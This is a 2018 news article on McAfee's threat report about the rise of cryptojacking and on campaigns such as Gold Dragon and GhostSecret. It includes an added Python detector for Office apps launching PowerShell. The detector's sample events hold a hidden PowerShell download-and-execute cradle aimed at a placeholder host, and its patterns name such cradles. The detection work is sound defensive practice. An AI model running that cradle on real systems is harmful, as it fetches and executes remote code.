Cryptojacking malware up 600% in Q1

McAfee warns of boom in cryptomining malware as nearly 3 million samples found in first quarter

Tags: Cryptocurrency, Cryptomining, Cyber crime, Malware, McAfee (mcafee.com)
By Mark Sutton, published June 27, 2018

Cryptojacking malware grew by over 600% from the end of 2017 to the first quarter of this year, according to McAfee.

The security company said that over 2.9 million samples of coin-mining malware were discovered in Q1 2018, up from 400,000 in Q4 2017. Cryptojacking malware infects a user's PC and illicitly mines legitimate cryptocurrencies in the background.

McAfee attributed the 629% rise in cryptojacking to the ease with which it generates money for hackers. A typical cryptomining attack diverts the funds generated by mining directly to the attackers, who do not have to concern themselves with selling stolen data, extracting a ransom from a victim, or otherwise monetising their activity or laundering the funds.

"Cybercriminals will gravitate to criminal activity that maximizes their profit," said Steve Grobman, chief technology officer at McAfee. "In recent quarters we have seen a shift to ransomware from data-theft, as ransomware is a more efficient crime. With the rise in value of cryptocurrencies, the market forces are driving criminals to crypto-jacking and the theft of cryptocurrency. Cybercrime is a business, and market forces will continue to shape where adversaries focus their efforts."

The McAfee Labs Threat Report for June also noted targeted attacks to steal cryptocurrencies. The Lazarus cybercrime ring launched a highly sophisticated Bitcoin-stealing phishing campaign, HaoBao, which targeted global financial organisations and Bitcoin users. When a recipient opens the malicious email attachment, an implant scans for Bitcoin activity and establishes a further implant for persistent data gathering and cryptomining.

The company also noted that the more sophisticated hacking groups appear to have focused on technically refining their already advanced methodologies.

"There were new revelations this quarter concerning complex nation-state cyber-attack campaigns targeting users and enterprise systems worldwide," said Raj Samani, chief scientist at McAfee. "Bad actors demonstrated a remarkable level of technical agility and innovation in tools and tactics. Criminals continued to adopt cryptocurrency mining to easily monetize their criminal activity."

In January, McAfee Advanced Threat Research reported an attack targeting organisations involved in the Pyeongchang Winter Olympics in South Korea. The attack was executed via a malicious Microsoft Word attachment containing a hidden PowerShell implant script. The script was embedded within an image file and executed from a remote server. Dubbed Gold Dragon, the resulting fileless implant encrypted stolen data, sent the data to the attackers' command and control servers, performed reconnaissance functions, and monitored anti-malware solutions to evade them.
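The Gold Dragon chain described above starts with an Office document that launches a PowerShell script, which in turn pulls its payload from a remote server. That first step leaves a recognisable trace in endpoint process-creation telemetry. As an added defensive example (not code from McAfee's report or from this article), the following Python flags Office applications spawning a script host and scores the child's command line for indicators such as a hidden window, an encoded command, an execution-policy bypass, a download cradle, or a URL pointing at an image file. The log events are constructed samples modelled on Sysmon process-creation fields; the field names, the application lists and the indicator patterns are assumptions for this example.

```python
import re

# Parent applications whose child processes are worth scrutiny (assumed list).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts an Office document has no routine reason to launch (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line indicators; each raises the severity of a finding.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "exec_bypass": re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b|start-bitstransfer", re.I),
    # The article's implant was hidden in an image file; a script fetching a
    # .png/.jpg and running it is an unusual combination worth flagging.
    "image_url": re.compile(r"https?://\S+\.(?:png|jpg|jpeg|gif|bmp)\b", re.I),
}

# Constructed sample events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand "
                "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="},  # placeholder base64, not a real payload
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},  # user-launched, benign
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/logo.png')"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},  # printing helper, expected child of Word
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},  # no indicators, still notable
]


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(event):
    """Return a finding dict for an Office-to-script-host spawn, else None."""
    parent = basename(event["parent"])
    child = basename(event["image"])
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("cmdline", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # Any Office -> script host spawn is "medium"; indicators raise it to "high".
    severity = "high" if hits else "medium"
    return {"parent": parent, "child": child, "indicators": hits, "severity": severity}


def detect(events):
    """Run analyze_event over a batch of process-creation events."""
    findings = []
    for idx, event in enumerate(events):
        finding = analyze_event(event)
        if finding is not None:
            finding["event_index"] = idx
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f['event_index']}: {f['parent']} -> {f['child']} "
              f"[{f['severity']}] {', '.join(f['indicators']) or 'no indicators'}")
```

The rule is deliberately two-tiered: the parent/child relationship alone is worth a medium-severity alert because Office applications rarely need a script host, while the command-line indicators distinguish a likely macro-launched loader from an analyst or administrator running a one-off command. In production the allow-list of expected Office children (such as the print helper above) would be tuned per environment.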

Operation GhostSecret targeted the healthcare, finance, entertainment, and telecommunications sectors. Operation GhostSecret is believed to be associated with the international cybercrime group known as Hidden Cobra. The campaign, which employs a series of implants to appropriate data from infected systems, is also characterized by its ability to evade detection and throw forensic investigators off its trail. The latest Bankshot variation of GhostSecret uses an embedded Adobe Flash exploit to enable the execution of implants. It also incorporates elements of the Destover malware, which was used in the 2014 Sony Pictures attack, and the Proxysvc implant, a previously undocumented implant that has operated undetected since mid-2017.
